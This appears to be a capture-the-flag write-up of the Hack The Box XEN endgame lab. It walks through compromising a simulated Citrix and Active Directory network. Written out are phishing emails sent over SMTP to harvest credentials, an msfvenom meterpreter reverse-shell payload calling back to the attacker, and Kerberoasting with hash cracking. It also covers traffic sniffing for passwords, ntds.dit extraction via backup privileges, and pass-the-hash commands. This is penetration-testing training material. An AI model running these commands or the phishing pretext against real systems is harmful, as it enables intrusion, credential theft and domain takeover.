Hack the Box – XEN ( retired june 2020 )
1st I add the IP of the machine 10.13.38.12 to /etc/hosts as xen.htb
NMAP
As always we start with a nmap scan
E:\PENTEST>nmap -A -oN htb-endgame-xen 10.13.38.12 Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-09 14:41 W. Europe Summer Time Stats: 0:00:43 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan Service scan Timing: About 66.67% done; ETC: 14:42 (0:00:11 remaining) Nmap scan report for humongousretail.com (10.13.38.12) Host is up (0.024s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 25/tcp open smtp | fingerprint-strings: | GenericLines, GetRequest: | 220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL) | sequence of commands | sequence of commands | Hello: | 220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL) | EHLO Invalid domain address. | Help: | 220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL) | DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY | NULL: |_ 220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL) | smtp-commands: CITRIX, SIZE 20480000, AUTH LOGIN, HELP, |_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY 80/tcp open http Microsoft IIS httpd 7.5 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/7.5 |_http-title: Humongous Retail 443/tcp open ssl/http Microsoft IIS httpd 7.5 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/7.5 |_http-title: Humongous Retail | ssl-cert: Subject: commonName=humongousretail.com | Subject Alternative Name: DNS:humongousretail.com | Not valid before: 2019-03-31T21:05:35 |_Not valid after: 2039-03-31T21:15:35 |_ssl-date: 2020-04-09T12:42:58+00:00; +9s from scanner time. | sslv2: | SSLv2 supported | ciphers: | SSL2_RC4_128_WITH_MD5 |_ SSL2_DES_192_EDE3_CBC_WITH_MD5 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port25-TCP:V=7.70%I=7%D=4/9%Time=5E8F182C%P=i686-pc-windows-windows%r(N SF:ULL,33,"220\x20ESMTP\x20MAIL\x20Service\x20ready\x20\(EXCHANGE\.HTB\.LO SF:CAL\)\r\n")%r(Hello,55,"220\x20ESMTP\x20MAIL\x20Service\x20ready\x20\(E SF:XCHANGE\.HTB\.LOCAL\)\r\n501\x20EHLO\x20Invalid\x20domain\x20address\.\ SF:r\n")%r(Help,6F,"220\x20ESMTP\x20MAIL\x20Service\x20ready\x20\(EXCHANGE SF:\.HTB\.LOCAL\)\r\n211\x20DATA\x20HELO\x20EHLO\x20MAIL\x20NOOP\x20QUIT\x SF:20RCPT\x20RSET\x20SAML\x20TURN\x20VRFY\r\n")%r(GenericLines,6F,"220\x20 SF:ESMTP\x20MAIL\x20Service\x20ready\x20\(EXCHANGE\.HTB\.LOCAL\)\r\n503\x2 SF:0Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20c SF:ommands\r\n")%r(GetRequest,6F,"220\x20ESMTP\x20MAIL\x20Service\x20ready SF:\x20\(EXCHANGE\.HTB\.LOCAL\)\r\n503\x20Bad\x20sequence\x20of\x20command SF:s\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n"); Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: specialized|general purpose|phone Running (JUST GUESSING): Microsoft Windows 7|8|Phone|2008|8.1|Vista (91%) OS CPE: cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 Aggressive OS guesses: Microsoft Windows Embedded Standard 7 (91%), Microsoft Windows 8.1 Update 1 (91%), Microsoft Windows Phone 7.5 or 8.0 (91%), Microsoft Windows 7 or Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 (90%), Microsoft Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 R2 or Windows 8.1 (90%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (90%), Microsoft Windows 7 (90%), Microsoft Windows 7 Professional or Windows 8 (90%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 8s, deviation: 0s, median: 8s TRACEROUTE (using port 443/tcp) HOP RTT ADDRESS 1 24.00 ms 10.14.14.1 2 24.00 ms humongousretail.com (10.13.38.12) OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 60.99 seconds E:\PENTEST>
It seems we have HTTP and HTTPS on port 80 and 443, and SMTP on 25.
Overview of Web Services
Let’s take a quick look at the webpages to see what we have. I got the following on port 80, which redirected me to port 443, the certificate for the site provided and a new domain of hunongousretail.com.
I didn’t have much to go on, so I decided to do some directory enumeration.
Directory Enumeration
I used wfuzz in this case because gobuster didn’t come up with anything useful. wfuzz –hc 404 -w raft-small-words.txt http://10.13.38.12/FUZZ
Web Directories
We had several other directories that seemed interesting but the ones I wanted to look at are Remote and Jakarta.
Opening the https://hunongousretail.com/remote, I get the following.
And browsing https://hunongousretail.com/jakarta, I got the following.
I had a look at these for some time to see if I could come up with anything useful, I looked deeper into the directories and for known exploits for the XenAPP application. Knowing this environment is called XEN, I decided to concentrate my efforts on the remote directory, rather than the Jakarta. After spending some more time on this, I decided to investigate the SMTP service. I had done examples in the past where the users were very responsive.
SMTP Enumeration
I had the domain name of the company, therefore I decided to see if I could get any email addresses and see if I could somehow get a response from someone. smtp-user-enum -M RCPT -U ./usernames.txt -D humongousretail.com -t 10.13.38.12
I had found 4 addresses;
- sales@humongousretail.com
- it@humongousretail.com
- marketing@humongousretail.com
- legal@humongousretail.com
Now that I had these 4 addresses, I needed to ensure that I could send mail through. I decided to use an internal address to try and get a response from someone.
User Response
To see if I was getting a response, I had a listener running to capture anything that may come through.
nc -nlvp 80
I then attempted a lot of different emails and a lot of different subjects. I eventually got a hit with the subject of Remote. My thoughts on this was to try and get the users to click on my link. My thoughts were as follows;
telnet 10.13.38.12 25 helo humongousretail.com
MAIL FROM: it@hunongousretail.com
RCPT TO: sales@humongousretail.com
DATA Subject: Remote Portal Hi, The URL for the remote portal has now been changed to http://10.14.15.106 Regards
IT QUIT
I chose to do this because a mail from the IT department sent out to a group of people would hopefully get me something. The users should trust an email coming in from IT, or so you would think.
Once the email had been sent, I didn’t get a response, but 30 seconds later, I had some data returned. It was the user clicking on the link to the new portal and providing their credentials.
I had a username of pmorgan and a password of Summer1Summer!. Although I knew that had worked, I tried again to ensure I had it correctly, and had a different user response.
I now had another user. This one being jmendes and password VivaBARC3L0N@!!!.
I kept this up to see if I could get any more responses and I had one more.
The last response I had gave me the user awardel and password @M3m3ntoM0ri@. I had 3 users
pmorgan:Summer1Summer! jmendes: VivaBARC3L0N@!!! awardel:@M3m3ntoM0ri@
Citrix XenAPP
I had the 3 users and knew that they must work somewhere. I browsed to the remote site and entered the credentials of pmorgan
And I now had access to a desktop.
I tried this for each user that I had and each of the worked and successfully logged in.
I clicked on the Desktop to access and and was asked to open the launch.ica file which was defaulted to open with the Citrix Receiver Engine. after i installed icaclientWeb_19.12.0.19_amd64.deb on kali
Once I had click ok, I was presented with a Desktop. I browsed to the Desktop of the user and I was presented with the 1st flag.
1 – XEN{wh0_n33d5_2f@?} Breach
Gaining a shell
Now that I had access to the desktops, I wanted to get a shell to see if I could elevate my privileges them. I first made a note off all the users and desktops they were assigned to
I created the reverse shell that I wanted so that I could get a meterpreter session.
msfvenom –platform windows -p windows/meterpreter/reverse_tcp LHOST=10.14.15.106 LPORT=10086 -f exe x86exploit.exe
I then proceeded to setup m msfconsole as follows.
Now that I had everything setup, I started the SimpleHTTPServer so that I could download the file necessary to exploit the system.
python -m SimpleHTTPServer 80
I then browsed to my machine on the vdesktop and downloaded the file.
I now started the exploit and got a meterpreter shell.
Privilege Escalation on Desktop
Now that I had a meterpreter shell, I wanted to see if I could elevate my privileges. I decided to use the local exploit suggester.
I first put my session to the background and started the suggester. use post/multi/recon/local_exploit_suggester
Seeing the results from the suggester, I decided on using the always install elevated exploit. use exploit/windows/local/always_install_elevated
I had successfully raised my privileges. I looked to see what was on the Administrator Desktop, and I had found the second flag.
2 – XEN{7ru573d_1n574ll3r5} Deploy
Further Enumeration
Now that I had a way into the inside of the network, I saw the internal network as 172.16.249.0/24, I wanted to perform a quick scan of the network to identify hosts. To pivot within the internal network, I used a socks proxy within msf. use auxiliary/server/socks4a
Now that I had done this, I wanted to see what hosts were live on the internal network. Knowing the IP’s of the desktops, I chose to only scan a small range. I wanted to scan between 199 and 210.
I managed to get an additional 3 IP’s.
- 172.16.249.200 (DC)
- 172.16.249.201 (Citrix)
- 172.16.249.202 (NetScaler)
Because of this, I decided to use a technique I had used in a previous engagement called Kerberoasting.
With the system shell that I had earlier, I decided to upload the Kerberoasting module.
Further credentials
I now wanted to see if there were any further credentials that I could find
PS C:\Users\pmorgan\Desktop> .\Rubeus.exe kerberoast /outfile:service_ticket.txt ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v1.4.2 [*] Action: Kerberoasting [*] NOTICE: AES hashes will be returned for AES-enabled accounts. [*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts. [*] Searching the current domain for Kerberoastable users [*] Found 1 user(s) to Kerberoast! [*] SamAccountName : mturner [*] DistinguishedName : CN=Mark Turner,OU=Contractors,DC=htb,DC=local [*] ServicePrincipalName : MSSQLSvc/CITRIXTEST.HTB.LOCAL:1433 [*] Supported ETypes : RC4_HMAC_DEFAULT [*] Hash written to C:\Users\pmorgan\Desktop\service_ticket.txt [*] Roasted hashes written to : C:\Users\pmorgan\Desktop\service_ticket.txt PS C:\Users\pmorgan\Desktop> dir Directory: C:\Users\pmorgan\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -a--- 4/4/2020 11:13 AM 7 cmd.bat -ar-- 4/6/2019 11:11 PM 19 flag.txt -a--- 2/20/2020 6:53 PM 41534 Invoke-Portscan.ps1 -a--- 3/26/2020 10:56 AM 16128568 netscan64.exe -a--- 4/6/2020 8:57 PM 295 netscan64.lic -a--- 4/6/2020 8:57 PM 39301 netscan64.xml -a--- 2/20/2020 6:30 PM 770279 powerview-dev.ps1 -a--- 9/22/2019 10:20 AM 883600 putty.exe -a--- 11/27/2019 2:17 PM 198144 Rubeus.exe -a--- 4/6/2020 9:12 PM 2172 service_ticket.txt -a--- 3/28/2020 11:17 AM 832512 SharpHound.exe -a--- 3/28/2020 11:17 AM 973323 SharpHound.ps1 -a--- 4/6/2020 8:59 PM 32665 winPEAS.bat -a--- 4/6/2020 8:59 PM 241152 winPEAS.exe [to get a proper command prompt we us] PS C:\Users\pmorgan\Desktop> type cmd.cmd cmd.exe PS C:\Users\pmorgan\Desktop> type service_ticket.txt $krb5tgs$23$*mturner$htb.local$MSSQLSvc/CITRIXTEST.HTB.LOCAL:1433*$107F90C880956CA6ABBBAB4F9C2FB71B$15B748ACB9F233974753E8F01B946449197403730D59DB4B2D72E600B8C7AC5D3178F52A1C5562A1146824D2F33756CBF95D70EAC796B6F1D006FF6CF3DC1D1EA05B6E9839D67AA634F7B0FD24C1CE69F7CE49B5314CCFA49D074BEA3A457E5EEA9F91822E7F1676439ED137A54E5ADF1546A6AB5CA3B808EECC77A5F2E94880B39457CD714425340EA8DFE186B9A90BE5C541D990C6C7E0C82F95043A81DC85DF709CF7E45151B022EA8275C4ED2F0578F9462847F9E1CF21BEFBA5FB187A810DFAD7D2D62C04785842CBD44BB1B8AA94E9D9EFA691A8FF54392210C635E8B004C42E4F71EFF3EC30599A33F1F434A1705FF4378E553071A6A974FB58569CCFDE795E39492AD893BDBF55916EA6763D63C1CF476ABA8FC24790F8954C80B5503147681BDA02EB8A9DDE56DE33A266851AFC99E72A6E08C5CA6BD127EC9AAA3BD3AE026E94BD481FF3583A28C9A3CF408110C4FF8551A27E615A15F0125AAB8761E8D5B1DA35858BE845D031F253E46EBE6987A94D1A8848820511226F95C4F0E27798E575F179C06EBB12C76EEAFD4CA977E085A392B06EB805033A229C26504AA8EB871041346DAB4B92D5400B030C6CFA0EE853656F4AAAF857F04B30D0BF7376B37634CE0DD3D82B78A3005E5C3E174915960674AE255995A3B37AFC82944D87920BE43302DFF9EAC0D559298D943FAFFBA118DA31688858C415342B729949B6366B07F3A8AD9B3B310A73EB689C38A087C4E05D9917DC46E01B25C808B7A3F93449E1E5CD7CA02018EA77DD3E339BDDF6ACF4CCC991BDAFB45E9809F9C12CF9358C5D07ABFA105E90206EE59B7ED6D5161BA186AF275AEC9B046B0E600585750BC259FA108CD62A0CFF191F4A30EFEE4BAFECCE07F3BAC3A22055672F4E761D220D5F8E1CB4BD51FA5BDCC8CDA524A709A389A31E913174455592CE322BFD32E572A7DF97C599E05CC3771A4FA952B9C34B273AD284DF237187EDCEAF2922AFBE3C4927E67B2B5FEA3F9AB57AD47436031EDB5A8D4C5D31FACF307E8CAAD66D61D6760CA3B9A4EDF10B0F6315B9D3FA7F7118EC6AA446F4642883D7DAF016CB4F7F8F3DB305AD0F6CB087FA149B4C439EE164B6B809EFD1A2FABDD115D77B1371B06968C8E6479BFB94C51763EE71A064D445D28FE30EF81EE3FDDF437C495305913C30F4B99E749187F1C09DD3DC10DD39B23AD5A84BE8CA906D3C01770CD71291FBC43D3D2A61E0DBD651106BFE97B6F2DFFF1A70F0BC825BD68D3B791CD67211162BA7C021D606FA0AD46175FF04E785607F186885802F0305F04876A5657CE9DB0BAECEBA1F2593DC7C8B70B295DE3D0F47201CD149232DCBB303853A4042677C96F9E286A06A8AB54F3FAAE0B3DCF2D92D76F511FB11492364C8AF22AC6F0462E039D66F74025BB76BC870B94388D69FD1295DF592C6205B8871BD55FCC5429EDCB690719836 PS C:\Users\pmorgan\Desktop> copy "\\Client\D$\SharpHound.ps1" . PS C:\Users\pmorgan\Desktop> Set-ExecutionPolicy -Scope CurrentUser PS C:\Users\pmorgan\Desktop> Bypass PS C:\Users\pmorgan\Desktop> .\Sharphound PS C:\Users\pmorgan\Desktop> Import-Module .\SharpHound.ps1 PS C:\Users\pmorgan\Desktop> get-help Invoke-BloodHound PS C:\Users\pmorgan\Desktop> Invoke-BloodHound -CollectionMethod All PS C:\Users\pmorgan\Desktop> copy .\service_ticket.txt \\Client\D$\ PS C:\Users\pmorgan\Desktop> copy "\\Client\D$\netscan64.exe" . PS C:\Users\pmorgan\Desktop> PS C:\Users\pmorgan\Desktop> Import-Module .\powerview-dev.ps1 PS C:\Users\pmorgan\Desktop> Get-NetUser PS C:\Users\pmorgan\Desktop> Get-NetUser | Ft samAccountName
I copied the contents of this token to a file named mturner so that I could now run this through hashcat.
I exhausted all password lists that I had with this and decided to look up some hashcat rules online to see what I could come up with. I eventually came up with a ruleset that had potential which was found at https://github.com/NSAKEY/nsa–rules.git.
hashcat -m 13100 ./mturner rockyou.txt rules/_NSAKEY.v2.dive.rule –debug-mode=1 –debugfile=matched.rule –force -0
After several hours, I eventually got a hit on the password.
We now know that the password for mturner is 4install!
SMB Access
Now that I had the new credentials I looked about a little more to see what else I could find. I eventually found SMB on 172.16.249.201 and decided to use the credentials found to see if I could see anything. proxychains smbmap -u mturner -p ‘4install!’ -d htb.local -H 172.16.249.201
This showed that we had access to read the files locate in the Citrix$ folder. I connected to this to see what was inside the folder with smbclient tools.
proxychains smbclient \\\\172.16.249.201\\Citrix$ -U htb.local
I was provided with some interesting files. The 2 of interest at this point are flag.txt and private.ppk.
I downloaded these file and was able to read the next flag.
3 – XEN{l364cy_5pn5_ftw} Ghost
Putty file Conversion
Now that I had a putty private key file, I had a look at its contents to see if I could get a hint at anything.
It seems this could be used in putty but has a password on it too. I needed to try and crack the password on this before I could proceed. I decided to convert this with putty2john. putty2john private.ppk > private.hash
Now that I had this file in a readable format for john, I tried to crack the password.
After several hours, all my password lists came up empty. I was unable to crack the password with what I had. I decided to look elsewhere to see what I could potentially use as a password list generator. I found a password generator that seemed interesting and decided to run with it. I found this at https://github.com/hashcat/kwprocessor
./kwp -o passes basechars/tiny.base keymaps/en-gb.keymap routes/2-to-32-max-5-directionchanges.route
Once I had the password list generated, I then had to put it through john to try and crack it again. john -w=./passes private.hash
Now that I knew the password for the file, I could now convert the file for use with my system. To do this, I used puttygen. puttygen private.ppk -O private-openssh -o id_rsa
I now had a key file that I could use.
Access to NetScaler
During the time gathering information, I had accumulated many user id’s and I tried all of them with the private key to get onto the SSH of the NetScaler. I then quickly found the default username of the devices is nsroot. I then attempted to login with this user id. proxychains ssh -i id_rsa nsroot@172.16.249.202
Now that I had access to the NetScaler as root of the device, I hunted around to see if I could find anything. After a while of searching, I did not come up with anything useful. Remembering that the device is essentially a firewall and router, I decided to listen to the traffic passing through the device and remembered a specific article at https://hackertarget.com/tcpdump–examples/.
I attempted this to see if I would get any results. tcpdump -s 0 -A -n -l | egrep -I “POST /|pwd=|passwd=|password=|Host:”
4 – XEN{bu7_ld4p5_15_4_h455l3} Camouflage
LDAP
Knowing that I had access to this box as root, I wanted to perform some additional test to see what other potential traffic was being passed through it. The previous flag seemed to suggest ldap could be being used. I set up a tcpdump to capture this for me. tcpdump -w capture.pcap
I now had to transfer the file back to my machine for investigation. I used scp for this.
proxychains scp -i id_rsa nsroot@172.16.249.202:/root/capture.pcap .
I then opened this file within Wireshark to see what I could find.
Now going from the previous hint, I searched for the LDAP traffic and found a password.
The password that I had found was #S3rvice#@cc which was for the netscaler-svc account.
msf > use auxiliary/server/socks4a msf > set srvport 8888 msf > route add 172.16.249.0 255.255.255.0 1 msf exploit
root@kali:~/htb/xen# proxychains GetUserSPNs.py -request -dc-ip 172.16.249.200 HTB.LOCAL/netscaler-svc:#S3rvice#@cc ProxyChains-3.1 (http://proxychains.sf.net) Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation |S-chain|-<>-127.0.0.1:8888-<><>-172.16.249.200:389-<><>-OK ServicePrincipalName Name MemberOf PasswordLastSet LastLogon ---------------------------------- ------- --------------------------------------- -------------------------- -------------------------- MSSQLSvc/CITRIXTEST.HTB.LOCAL:1433 mturner CN=Deployment,OU=Groups,DC=htb,DC=local 2019-02-13 23:23:48.796612 2019-04-10 22:14:57.105936 |S-chain|-<>-127.0.0.1:8888-<><>-172.16.249.200:88-<><>-OK |S-chain|-<>-127.0.0.1:8888-<><>-172.16.249.200:88-<><>-OK |S-chain|-<>-127.0.0.1:8888-<><>-172.16.249.200:88-<><>-OK $krb5tgs$23$*mturner$HTB.LOCAL$MSSQLSvc/CITRIXTEST.HTB.LOCAL~1433*$30e2233e1b0123f3c7579d9f7a2384fb$08230b2c73edf5bc2afe0b13d494c385d67db84bc38ac830497f2e8eb1f2c148094dcd6f1cad0d26a896291119eb2a8cb196d388c568ce2348d4e69f16da74245af5298d42cf19c7958359f901d4a0f32ffb708e4ac037dd49411fce5e59ff58d6f3e184dcb7064b86c134bed4a6bf74af15875edd0800b464d3146559b62cadccd399484b4317f63aab2a9fe85ae08bfe4dece4ff25f040fa9de0c61f290670df1dd5b368a0c5b8c6e546bf547c6fbb63cb1bdf179d0eedb0ee37647a6a8e63d4a76b0e5d9f511e751cf8b4acfa4702aac9050a6e01496e4a4d26762805d950b27723d7e2a9831de5a8fdd78b8e480b16974ff4865114d74c1eee1715d5cd862afcff076f448c370c1b2ae0666770c00391c65384f525ff6f33210077e2b73cf0ae892352b3163fd0fde062e037adafbec57c705535d751efd0ecc31356cd8d933c29635107aa5add7043df5a20710a056869b872cb60203e7d7934574579837e01df2e57c580f4c6e19483c821bd5f533b378d43df50ad8fc6665bab80be7478462ccecca5208710a6b85b001ca602c2ab1920f6134ed5a59a27cd622ec2ffa6828ac4e65cb10b9d3dc5f61a50a7002ea737b41d9ffc603c0b54fe70764773468eced0d158a67ba15fe7c62083a01b447f5be2218a3ab6500378f69bacb34e6fcc1050320d9c965e75b188bf2d64ca89815b77220aa1300787e43fe9b0123447247b9ac82774c27425668d03930c48bde5cbb71d29b49d18c0473efb6a5707ca8498577b81f9a371b5fba0020699df3e0ad90566a9b366f731c98c2c1b1a454b0081aaf9d9074e69d3d0b47fcbf235b45d483bc37a0bb82f68623d6d2fd3d6bd43c2927bc713247fbcd5d492101b2b4f9b122b070897bae58d85730e5f718ad293401ea8fa9a9d691cf5e13c5187d91ed09ab4a2f5b57803e655e97145a7c0a9b371430d1f5e97e9f023f3a07ec587269758a6f2f2c2a58a2d8e61694c1950123edac23cbd9d007723d94b8542eef551a0459a50bed98f8a3d870bb8b55c2db8f12ed382fe9a4c5ed754eea8e14aa2c1b1cd15d3f2bed369071e2474eb93a0e9f9a2dfb986b25ed3459f5a956578d309fa74b6855beccdf7ba5e6facc63ebd1f6f251656b7756683582fe20e3b6cf669116df64ba68bd6beb3c09076a343f3f2b665b70d13ec65e18ddcea07bcae355517e1bdfb3bc2fc35542f08e9d29e5d1d047ecc04e4eed26bfbc8e397549820605811c7c154cfdd2650ee928d93fb770f55a84ce5ff864fbcb9e6a458f3b04c82d6d890315b0ae78227bea7ab43939d22466c27a8d8501eee6c7218dcdf772bde661302151ea644cfcc2576e8e462
root@kali:~/xen# proxychains smbmap -u mturner -p '4install!' -d htb.local -H 172.16.249.201 ProxyChains-3.1 (http://proxychains.sf.net) [+] Finding open SMB ports.... |S-chain|-<>-127.0.0.1:1080-<><>-172.16.249.201:445-<><>-OK |S-chain|-<>-127.0.0.1:1080-<><>-172.16.249.201:445-<><>-OK |S-chain|-<>-127.0.0.1:1080-<><>-172.16.249.201:445-<><>-OK [+] User SMB session establishd on 172.16.249.201... [+] IP: 172.16.249.201:445 Name: 172.16.249.201 Disk Permissions ---- ----------- ADMIN$ NO ACCESS C$ NO ACCESS Citrix$ READ ONLY IPC$ NO ACCESS ISOs NO ACCESS ISOs-TEST NO ACCESS root@kali:~/xen#
root@kali:~/xen# proxychains smbclient \\\\172.16.249.201\\Citrix$ -U htb.local\\mturner ProxyChains-3.1 (http://proxychains.sf.net) WARNING: The "syslog" option is deprecated |S-chain|-<>-127.0.0.1:1080-<><>-172.16.249.201:445-<><>-OK Enter HTB.LOCAL\mturner's password: 4install! Try "help" to get a list of possible commands. smb: \> ls . D 0 Wed May 8 18:12:51 2019 .. D 0 Wed May 8 18:12:51 2019 Deploying-XenServer-5.6.pdf A 997001 Tue Feb 12 18:21:10 2019 flag.txt AR 20 Sun Mar 31 11:25:10 2019 private.ppk A 1486 Wed May 8 18:21:51 2019 XenServer-5-6-SHG.pdf A 1747587 Tue Feb 12 18:21:32 2019 10485247 blocks of size 4096. 6344443 blocks available
Doppelganger
The term doppelganger is a non-biologically related look-alike (Wikipedia). This provided me with the hint of looking back at the other accounts that were active on the domain. I immediately got access to a shell again on the desktop and looked up domain details.
I was looking for what was hopefully an account that may seem to be like the found netscaler-svc account.
After all, I had tried this account in so many different places to access different resources and none were successful.
net user /domain
After a few attempts at usernames, I discovered that the backup-svc had the same password as the NetScaler password. These essentially shared the same password. This was out doppelganger. I then tried to login to the Domain controller using winrm and proxychains to see if I could get a successful access because I knew it was a member of the Backup Operators group which generally has access. proxychains ruby winrm_shell_with_upload.rb
root@kali:~/xen# proxychains ruby winrmshell2withupload.rb ProxyChains-3.1 (http://proxychains.sf.net) |S-chain|-<>-127.0.0.1:1080-<><>-172.16.249.200:5985-<><>-OK PS htb\backup-svc@DC Documents> PS htb\backup-svc@DC Desktop> type flag.txt XEN{y_5h4r3d_p@55w0Rd5?} PS htb\backup-svc@DC Desktop>
I looked on the Desktop of backup-svc and found the next flag.
5 – XEN{y_5h4r3d_p@55w0Rd5?} Doppelganger
Privileges
Now that I was on the box, I wanted to see what privileges I had to understand what else could be achieved with simply logging in through WinRM. whoami /priv
This was sure interesting. It seems I had a few privileges including the Backup and Restore. This seemed obvious though with the account being named backup-svc.
I first tried to access the Administrator Desktop and was denied access.
From this I knew something had to be done with backup privileges. I had recently done an exercise in the office that I work in on retrieving the Active Directory Database to extract the hashes. This is something that I do on a regular basis and therefore knew I would have to create a shadow copy of the drive to even attempt to gain access to the NTDS.
I looked at all the usual methods of creating a shadow copy including vssadmin and wbadmin. However, I then found an article which covered doing this with diskshadow. This was highlighted in the following document. https://github.com/decoder–it/whoami–priv–
Hackinparis2019/blob/master/whoamiprivParis_Split.pdf. I wanted to try and get RDP access to the machine and therefore setup a portfwd to give me access.
portfwd add -l 3389 -r 172.16.249.200 -p 3389
I then tried to open an RDP session to the machine using remmina.
I decided to utilise this to give myself hopefully a little more access proxychains xfreerdp ipv remmina
Install freerdp-x11
sudo apt-get install freerdp-x11
root@kali:~# proxychains xfreerdp /v:172.16.249.200 /u:backup-svc ProxyChains-3.1 (http://proxychains.sf.net) [03:37:43:732] [6460:6461] [INFO][com.freerdp.client.common.cmdline] - loading channelEx cliprdr |S-chain|-<>-127.0.0.1:1080-<><>-172.16.249.200:3389-<><>-OK Password: #S3rvice#@cc [03:37:58:008] [6460:6461] [INFO][com.freerdp.gdi] - Local framebuffer format PIXEL_FORMAT_BGRX32 [03:37:58:008] [6460:6461] [INFO][com.freerdp.gdi] - Remote framebuffer format PIXEL_FORMAT_RGB16 [03:37:58:120] [6460:6461] [INFO][com.winpr.clipboard] - initialized POSIX local file subsystem
And I was given the RDP access I was looking for.
I now decided to run through diskshadow to see if I could create a shadow of the drive.
Shadow Copies
Diskshadow set context persistent nowriters add volume c: alias dmwong create expose %dmwong% z:
Once I had created the backup, I restore this by importing the modules found at
https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Deb ug.
I opened PowerShell and imported the 2 modules.
Copy-FileSebackupPrivilege z:\Windows\NTDS\ntds.dit c:\temp\ndts.dit reg save hklm\system c:\temp\system.bak
Now that I had access to these files, I continued to download them onto my system for offline cracking.
Domain Admin
Now that I had these files offline I needed to extract the hashes. python /opt/impacket/examples/secretdump.py -ntds ndts.dit -system system.bak LOCAL
This provided me with all the hashes from the Active Directory Database. Now that I had all of these hashes, I decided to use the ‘Pass the Hash’ method to try and gain access to the Domain controller as Administrator.
proxychains python /opt/impacket/examples/wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:822601ccd7155f47cd955b94af1558be Administrator@172.16.249.200
6 – XEN{d3r1v471v3_d0m41n_4dm1n} Owned
Author – Puckiestyle